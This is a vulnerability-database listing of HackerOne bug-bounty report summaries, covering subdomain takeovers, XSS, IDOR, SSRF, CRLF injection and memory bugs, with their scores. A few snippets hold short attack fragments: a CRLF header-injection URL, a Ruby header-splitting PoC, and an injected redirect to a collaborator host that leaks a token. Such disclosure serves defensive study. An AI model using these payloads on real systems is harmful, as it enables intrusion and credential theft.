Lucene search
K
HackeroneMost viewed

15369 matches found

Hacker One
Hacker One
added 2016/12/11 3:49 p.m.63 views

Gratipay: Gratipay uses the random module's cryptographically insecure PRNG.

Dear Gratipay bug bounty team, Summary --- Gratipay currently uses the random module's pseudo-random number generator which is not a cryptographically secure PRNG as stated in the docs: The pseudo-random generators of this module should not be used for security purposes. For security or...

Exploits0
Hacker One
Hacker One
added 2016/11/29 3:4 a.m.63 views

HackerOne: Internal attachments can be exported via "Export as .zip" feature

Hello HackerOne Team This newly disclosed report: 182358 Partial disclosure of report activity through new "Export as .zip" feature was not completely fix. I have found that i can still view the attachment after it is being removed on the thread. Best PoC is this 182358 since this is the newly fi...

0.5AI score
Exploits0
Hacker One
Hacker One
added 2016/11/11 10:43 p.m.63 views

Ubiquiti Inc.: Subdomain Takeover (moderator.ubnt.com)

Hello Team This report is same as 179110 One of your subdomain http://moderator.ubnt.com is pointing towards 216.58.203.243 moderator.ubnt.com 216.58.203.243 ghs.google.com 216.58.203.243 ghs.l.google.com F134183 And it is unclaimed When I open it it is showing F134184 Impact :- An attacker can...

0.2AI score
Exploits0
Hacker One
Hacker One
added 2016/09/28 7:20 p.m.63 views

Shopify: Add signature to transactions without any permission

Hi, I found an endpoint for transaction signing but user permission not checked on this endpoint So an user without any permission in shop can add signature to transactions! Endpoint: /admin/securefiles.json Parameters:...

0.7AI score
Exploits0
Hacker One
Hacker One
added 2016/09/07 5:34 p.m.63 views

Internet Bug Bounty: Cross-protocol attack on TLS using SSLv2 (DROWN) (CVE-2016-0800)

General DROWN was responsibly disclosed to the OpenSSL team prior to the public disclosure. This OpenSSL blog post, by Viktor Dukhovni and Emilia Käsper, describes the vulnerability: https://www.openssl.org/blog/blog/2016/03/01/an-openssl-users-guide-to-drown/ This is probably a good opportunity ...

4.3CVSS7.8AI score0.82112EPSS
Exploits2
Hacker One
Hacker One
added 2016/06/12 6:4 p.m.63 views

Paragon Initiative Enterprises: SMTP server allows anonymous relay from internal addresses to internal addresses

Hello, Issue descripton your incoming SMTP servers, provided by google , seems to be accepting without authentication mails from addresses @paragonie.com and destined for addresses @paragonie.com. This can greatly ease spear-phishing attacks, as users usually put much trust into emails coming fro...

6.9AI score
Exploits0
Hacker One
Hacker One
added 2016/03/09 7:17 p.m.63 views

Bumble: Account Takeover

Hello this is regarding an account takeover via import image from facebook option, when we import fb photos a link with a token generated which is valid for any user and it can be use to replace user linked fb account to attacker fb account And then login via fb to takeover account Note: I tested...

1.2AI score
Exploits0
Hacker One
Hacker One
added 2016/02/01 10:0 a.m.63 views

Ruby on Rails: Regarding [CVE-2016-0752] Possible Information Leak Vulnerability in Action View

Possible Information Leak Vulnerability in Action View. There is a possible directory traversal and information leak vulnerability in Action View. This was meant to be fixed on CVE-2016-0752. However the 3.2 patch was not covering all the scenarios. This vulnerability has been assigned the CVE...

5CVSS1.6AI score0.95537EPSS
Exploits11
Hacker One
Hacker One
added 2015/11/24 1:20 a.m.63 views

Radancy: SSL certificate invalid date

This SSL certificate is either expired or not yet valid. Some browsers will continue connecting to the site after presenting the user with the warning, while others will prompt the user with a dialog box requesting their approval to proceed. These warnings are extremely confusing for the typical...

2.1AI score
Exploits0
Hacker One
Hacker One
added 2015/09/18 12:0 a.m.63 views

Internet Bug Bounty: Integer overflow in unserialize() (32-bits only)

https://bugs.php.net/bug.php?id=68044...

7.5CVSS7.1AI score0.28862EPSS
Exploits1
Hacker One
Hacker One
added 2025/09/17 7:53 p.m.62 views

curl: Security Analysis Report: CURL Integer Overflow Vulnerability

Vulnerability Overview Vulnerability Type: Integer Overflow in HTTP chunked encoding Location in Source: lib/httpchunks.c line 173 lib/curlx/strparse.c lines 185–186 Impact: Integer overflow leads to memory corruption Can cause buffer overflow Results in Denial of Service DoS for curl Potential...

6.9AI score
Exploits0
Hacker One
Hacker One
added 2023/12/28 6:55 a.m.62 views

curl: Buffer Overflow Vulnerability in WebSocket Handling

Vulnerability description not provided...

7.1AI score
Exploits0
Hacker One
Hacker One
added 2023/11/10 6:31 p.m.62 views

FetLife: Able to see highest poll result without voting or view result

Vulnerability description not provided...

7.1AI score
Exploits0
Hacker One
Hacker One
added 2023/10/19 9:53 a.m.62 views

HackerOne: Hacker email disclosed on submission at hackerone hactivity

Vulnerability description not provided...

7.1AI score
Exploits0
Hacker One
Hacker One
added 2023/07/26 11:18 a.m.62 views

HackerOne: Takeover of hackerone.engineering via Github

The hacker was able to take over the hackerone.engineering domain after a brief misconfiguration window on GitHub. They claimed the domain in their own repository while the DNS records were still pointing towards GitHub. The issue has been resolved and no malware was found on the site during the...

6.9AI score
Exploits0
Hacker One
Hacker One
added 2023/03/11 7:22 p.m.62 views

GitHub: Authentication bypass on gist.github.com through SSH Certificates

An authentication bypass vulnerability was found in GitHub Enterprise Server that allowed unauthorized access to modify other users' secret gists through SSH certificates. The vulnerability affected all versions of GitHub Enterprise Server prior to 3.9 and was fixed in versions 3.4.18, 3.5.15,...

7.7CVSS5.7AI score0.00462EPSS
Exploits0
Hacker One
Hacker One
added 2022/10/22 11:43 a.m.62 views

Nextcloud: Mail app - blind SSRF via smtpHost parameter

A blind SSRF vulnerability was discovered in the Nextcloud Mail application, allowing an attacker to retrieve services running locally on the server and scan the internal network for information. The vulnerability was found in the smtpHost parameter and could be exploited by any user with the mai...

5CVSS4.6AI score0.00919EPSS
Exploits1
Hacker One
Hacker One
added 2022/08/10 3:47 p.m.62 views

GitLab: Stored-XSS with CSP-bypass via labels' color

Stored-XSS with CSP-bypass was discovered in Gitlab that allowed attackers to execute arbitrary actions on behalf of victims at the client side. This was possible due to the import of unsanitized label colors from Github, which led to the execution of malicious JavaScript code...

7.8AI score
Exploits0
Hacker One
Hacker One
added 2022/04/29 10:55 p.m.62 views

U.S. Dept Of Defense: CVE-2020-3187 - Unauthenticated Arbitrary File Deletion

A vulnerability in the web services interface of Cisco Adaptive Security Appliance ASA Software and Cisco Firepower Threat Defense FTD Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted...

7.5CVSS0.8AI score0.96595EPSS
Exploits4
Hacker One
Hacker One
added 2022/04/13 1:30 p.m.62 views

EXNESS: subdomain takeover at odoo-staging.exness.io

Domain: https://odoo-staging.exness.io PoC https://odoo-staging.exness.io Cname: $ host odoo-staging.exness.io odoo-staging.exness.io is an alias for exness-stg.odoo.com. exness-stg.odoo.com has address 141.95.172.222 exness-stg.odoo.com mail is handled by 10 eu123a.odoo.com. Impact Scam, phishin...

0.3AI score
Exploits0
Hacker One
Hacker One
added 2022/03/27 6:18 p.m.62 views

Zomato: Attacker shall recieve order updates on whatsapp for users who have activated whatsapp notification

H Summary: 1. Order ID are IDOR Insecure Direct Object Reference 2. When users activated whats app notification an attacker would start receiving the notification without user interaction about their order. Proof Of Concept:- When an user order on a restaurant he/she can start whatsapp notificati...

1AI score
Exploits0
Hacker One
Hacker One
added 2022/03/19 8:41 a.m.62 views

Nextcloud: SMTP Command Injection in iCalendar Attachments to Emails via Newlines

Note: This is similar to 1509216, but has a new source/attack vector. Apologies for not picking this up earlier. Summary: When users receive iCalendar attachments in Mail, there is an option to add it to their calendar: ██████████ Once they add it to calendar, a PUT request is sent: PUT...

3.5CVSS0.4AI score0.02421EPSS
Exploits1
Hacker One
Hacker One
added 2021/09/20 3:4 p.m.62 views

U.S. Dept Of Defense: Expired SSL Certificate allows credentials steal

Hi security Team! I've found this website with no valid SSL Certificate. https://██████████ Certificate has expired 314 days ago. Impact Error message can appear on page and user can have his credentials stolen by an attacker capturing the network data. System Hosts ███████ Affected Products and...

1.1AI score
Exploits0
Hacker One
Hacker One
added 2021/06/03 9:36 p.m.62 views

GitHub Security Lab: Python: Add support of clickhouse-driver package

This bug was reported directly to GitHub Security Lab...

1.1AI score
Exploits0
Hacker One
Hacker One
added 2021/05/26 2:31 a.m.62 views

Reddit: XSS

hi security team i have found a XSS in old.reddit.com and in reddit.com Description: Cross-site scripting also known as XSS is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the...

2AI score
Exploits0
Hacker One
Hacker One
added 2021/05/21 1:10 a.m.62 views

Ruby: RubyのCGIライブラリにHTTPレスポンス分割(HTTPヘッダインジェクション)があり、秘密情報が漏洩する

PoC1: !/usr/bin/env ruby require 'cgi' cgi = CGI.new url = "http://example.jp\r\nSet-Cookie: foo=bar;" External Parameter print cgi.header'status' = '302 Found', 'Location' = url Actual Result1: $ curl -s -i http://localhost:8080/cgi-bin/cgi.ru HTTP/1.1 302 Found Date: Fri, 21 May 2021 00:46:33 G...

6.5CVSS7.2AI score0.04569EPSS
Exploits1
Hacker One
Hacker One
added 2021/04/29 8:31 p.m.62 views

curl: CVE-2021-22901: TLS session caching disaster

Summary: lib/vtls/openssl.c osslconnectstep1 sets up the osslnewsessioncb sessionid callback with SSLCTXsesssetnewcb, and adds association from dataidx and connectdataidx to current conn and data respectively: SSLCTXsetsessioncachemodebackend-ctx, SSLSESSCACHECLIENT | SSLSESSCACHENOINTERNAL;...

6.8CVSS8AI score0.60122EPSS
Exploits1
Hacker One
Hacker One
added 2021/03/19 4:53 p.m.62 views

Open-Xchange: Null pointer dereference in lib-sieve after calling sieve_binary_block_index

There are some places that program calls function sievebinaryblockindex without checking the return valuemainly in sieve-binary-dumper.c. Such as: pigeonhole/src/lib-sieve/sieve-binary-dumper.c: bool sievebinarydumperrunstruct sievebinarydumper dumper, struct ostream stream, bool verbose struct...

7AI score
Exploits0
Hacker One
Hacker One
added 2021/02/11 10:12 p.m.62 views

Rockstar Games: Open redirect on https://signin.rockstargames.com/connect/authorize/rsg

In this report, the researcher found that a previously-addressed Open Redirect vulnerability on https://signin.rockstargames.com/connect/authorize/rsg had once again become exploitable. We were able to quickly re-apply our previous solution and once again resolve the vulnerability...

0.2AI score
Exploits0
Hacker One
Hacker One
added 2020/12/28 1:13 p.m.62 views

Shopify: Screenshot Service leaks X-ABS-App-Token

Login and create a development store 2. Start Burp Suite and open a burp collaborator client then copy the collaborator payload 3. Edit the section header.liquid of your current theme. Adding this: window.location="https://pasteherecollaborator/"; Finally go to...

0.4AI score
Exploits0
Hacker One
Hacker One
added 2020/08/27 7:24 p.m.62 views

U.S. Dept Of Defense: IDOR to Account Takeover on https://████/index.html

Hello Team! Summary: I found when you wish to update your profile on https://███████/ after your login through https://██████████/signIn/signIn.html website due to an IDOR. This IDOR gives you the opportunity to change the origin email for the registered account by changing the ID parameter on th...

0.1AI score
Exploits0
Hacker One
Hacker One
added 2020/07/27 11:47 a.m.62 views

U.S. Dept Of Defense: [██████████.mil] Cisco VPN Service Path Traversal

Hi team. Summary The Cisco VPN Service at ██████.mil is vulnerable to the CVE-2020-3452 vulnerability, which allows path traversing within the web service's file system on the targeted device. Steps to Reproduce Make a GET request to: http...

5CVSS1AI score0.99992EPSS
Exploits24
Hacker One
Hacker One
added 2020/05/18 7:58 p.m.62 views

Node.js third-party modules: [keyd] Prototype pollution

I would like to report a prototype pollution vulnerability in keyd module. It allows an attacker to inject properties on Object.prototype. Module module name: keyd version: 1.3.4 npm page: https://www.npmjs.com/package/keyd Module Description A small library for using and manipulating key paths i...

0.8AI score
Exploits0
Hacker One
Hacker One
added 2020/02/26 5:4 a.m.62 views

Internet Bug Bounty: PHP link() silently truncates after a null byte on Windows

The bug submitted at: https://bugs.php.net/bug.php?id=78862 The security advisory at: https://nvd.nist.gov/vuln/detail/CVE-2019-11044 The issue allow remote attackers to read or write arbitrary files via crafted input to an application that calls the vulnerable function. As demonstrated by a...

5CVSS6.7AI score0.05124EPSS
Exploits2
Hacker One
Hacker One
added 2020/01/27 4:49 p.m.62 views

Node.js: napi_get_value_string_X allow various kinds of memory corruption

Summary: napigetvaluestringlatin1, napigetvaluestringutf8, napigetvaluestringutf16 are vulnerable to buffer overflows, partially due to an integer underflow. Description: napigetvaluestringlatin1, napigetvaluestringutf8, and napigetvaluestringutf16 behave like this: 1. If the output pointer is...

9.3CVSS0.1AI score0.07646EPSS
Exploits1
Hacker One
Hacker One
added 2019/12/26 12:27 p.m.62 views

U.S. Dept Of Defense: Publicly accessible Grafana install allows pivoting to Prometheus datasource

Summary: A publicly accessible Grafana install exposes semi sensitive Dashboards. This also exposes the Prometheus proxied datasources which allow direct queries to a Prometheus instance which reveals sensitive data an opens the instance up to potential DoS via crafted requests. Description: Impa...

0.5AI score
Exploits0
Hacker One
Hacker One
added 2019/12/16 3:26 p.m.62 views

DataStax: Helpdesk Takeover at dmc.datastax.com

Summary: DNS record dmc.datastax.com is pointing to stale dmc-support.zendesk.com domain on Zendesk which is available for takeover. DNS Stale Records: F661014 Proof of Concept: There was no helpdesk configured at this address, which means that the address was available and anyone could claim it....

7AI score
Exploits0
Hacker One
Hacker One
added 2019/08/05 11:58 a.m.62 views

GitLab: Head pipeline leaked to unauthorized users via blocking merge request feature

Summary GitLab allows for public and internal projects to restrict the visibility of pipelines to project members only. Then, only project members should have access to the pipeline information. GitLab recently added the blocking merge request feature. This feature can be used to leak the head...

4CVSS6.4AI score0.01141EPSS
Exploits1
Hacker One
Hacker One
added 2019/08/01 5:45 a.m.62 views

Internet Bug Bounty: Out of Bounds Memory Read in php_jpg_get16

I have found and reported an out of bounds memory read in PHP phpjpgget16 When PHP EXIF extension is parsing EXIF information from an image, e.g. via exifreaddata function, in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6 it is possible to supply it with data what will...

6.4CVSS8.4AI score0.04068EPSS
Exploits1
Hacker One
Hacker One
added 2019/07/11 4:32 p.m.62 views

curl: Insecure Frame (External)

Summary: Insecure Frame External Steps To Reproduce: Vulnerability Details identified an external insecure or misconfigured iframe. Remedy Apply sandboxing in inline frame For untrusted content, avoid the usage of seamless attribute and allow-top-navigation, allow-popups and allow-scripts in...

7.3AI score
Exploits0
Hacker One
Hacker One
added 2019/04/08 5:29 a.m.63 views

Snapchat: Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata

Hey there, I was looking at your ads site with @daeken, we found some weird behavior in the import function of the creative app. Here are the steps: POC - Login to https://business.snapchat.com/ - Go to creative library - New Creative - Under "Topsnap Media", click on "Create" - Click on any of t...

6.8AI score
Exploits0
Hacker One
Hacker One
added 2019/03/04 10:43 a.m.62 views

Nextcloud: Predictable Random Number Generator

Description: The mobile application uses a predictable Random Number Generator RNG. Under certain conditions this weakness may jeopardize mobile application data encryption or other protection based on randomization. For example, if encryption tokens are generated inside of the application and an...

7AI score
Exploits0
Hacker One
Hacker One
added 2018/12/11 5:16 p.m.62 views

RATELIMITED: information disclosure which leak the apache version

Hello ratelimited team ! I have found a information disclosure which leak the apache version Link : https://social.ratelimited.me/manual/en/index.html Impact Leaking the http apache server version...

1.1AI score
Exploits0
Hacker One
Hacker One
added 2018/09/29 12:36 a.m.62 views

h1-5411-CTF: H1-5411 CTF Writeup

So, Hackerone posted a tweet about the Meme CTF Where barcode was in the tweet image by scanning it and decoding from hex I found this link : https://h1-5411.h1ctf.com/ where we can create/generate a memes and for generating the meme this was used form GitHub which i found in source code analysis...

7.7AI score
Exploits0
Hacker One
Hacker One
added 2018/04/20 9:12 a.m.62 views

Node.js third-party modules: [cloudcmd] Stored XSS in the filename when directories listing

I would like to report a Stored XSS issue in module cloudcmd It allows executing malicious javascript code in the user's browser. Module module name: cloudcmd version: 9.1.5 npm page: https://www.npmjs.com/package/cloudcmd Module Description Cloud Commander is an orthodox web file manager with...

6AI score
Exploits0
Hacker One
Hacker One
added 2018/04/03 7:26 p.m.62 views

Mail.ru: [dl.beepcar.ru] CRLF Injection

CRLF Injection via Get request PoC: https://dl.beepcar.ru/qwerty%0ASet-Cookie:%20test=qwerty;domain=.beepcar.ru HTTP Response: HTTP/1.1 302 Moved Temporarily Server: nginx/1.12.2 Date: Tue, 03 Apr 2018 19:20:31 GMT Content-Type: text/html Content-Length: 161 Connection: close Location:...

1.2AI score
Exploits0
Hacker One
Hacker One
added 2017/12/04 10:50 a.m.62 views

Mapbox: Admin Panel Accessed (OAuth Bypassed )

On December 4, 2017, @aneeskhan reported an authentication bypass vulnerability on a Mapbox internal portal. The vulnerability allowed them to bypass OAuth authentication and generate a valid session for the site. This session was then used by @aneeskhan to access information on the portal which...

7.1AI score
Exploits0
Hacker One
Hacker One
added 2017/10/31 2:25 p.m.62 views

Gratipay: i am The bug

I am the bug i found a bug in your site here it is F234717 my friend are the greatest hackers hackerone.com/s4k16 and smziaurrashid told me u will giv me $$$ for my father F234723...

6.7AI score
Exploits0
Hacker One
Hacker One
added 2017/06/29 6:32 p.m.62 views

WakaTime: Mailgun misconfiguration

During subdomain enumeration i found the following subdomain: email.mailgun.wakatime.com Looking at the cname records, it is pointing to mailgun. host email.mailgun.wakatime.com email.mailgun.wakatime.com is an alias for mailgun.org. mailgun.org has address 34.225.110.231 mailgun.org has address...

0.3AI score
Exploits0
Hacker One
Hacker One
added 2016/12/14 8:17 p.m.62 views

PortSwigger Web Security: HTTP OPTION Method is Enabled on portswigger.net

Enabled OPTION method on web server allows unauthorized blind submission of privileged GET requests...

1.5AI score
Exploits0
Total number of security vulnerabilities5000